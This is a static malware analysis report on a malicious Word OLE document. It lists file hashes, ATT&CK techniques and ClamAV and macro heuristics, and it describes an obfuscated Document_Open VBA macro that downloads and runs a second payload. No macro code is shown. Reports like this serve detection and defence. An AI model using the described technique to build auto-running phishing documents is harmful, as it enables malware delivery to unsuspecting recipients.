Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1999ae34c4afd7db…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 137.5 KB
Created: 1999-11-09 00:43:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: a2d9a0c7d3a2ce15776665c621754a23
SHA-1: 27503e602ea47d8bb8a9d02f433530079dd1a3bb
SHA-256: 1999ae34c4afd7db42f766645666fafee411653d2833737da2d524b41f5a4bc3
Risk score: 120

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The file is an OLE document containing a VBA macro that is automatically executed via the Document_Open subroutine. The macro appears to be heavily obfuscated, but its intent is to download and execute a secondary payload. The ClamAV detection name 'Doc.Trojan.Polymac-1' further supports its malicious nature.

Heuristics (3)

  • ClamAV: Doc.Trojan.Polymac-1 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Polymac-1
  • VBA macros detected (severity: medium; 1 related finding; rule: OLE_VBA_MACROS)
    Document contains VBA macro code
  • Document_Open macro (severity: high; rule: OLE_VBA_DOCOPEN)
    Document contains a Document_Open macro, which runs automatically when the document is opened

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 243730 bytes
SHA-256: c2410a797d2d845c1137e168f69c2965a88e33e468b000023376caff9698b044
Preview script
First 1,000 lines of the extracted script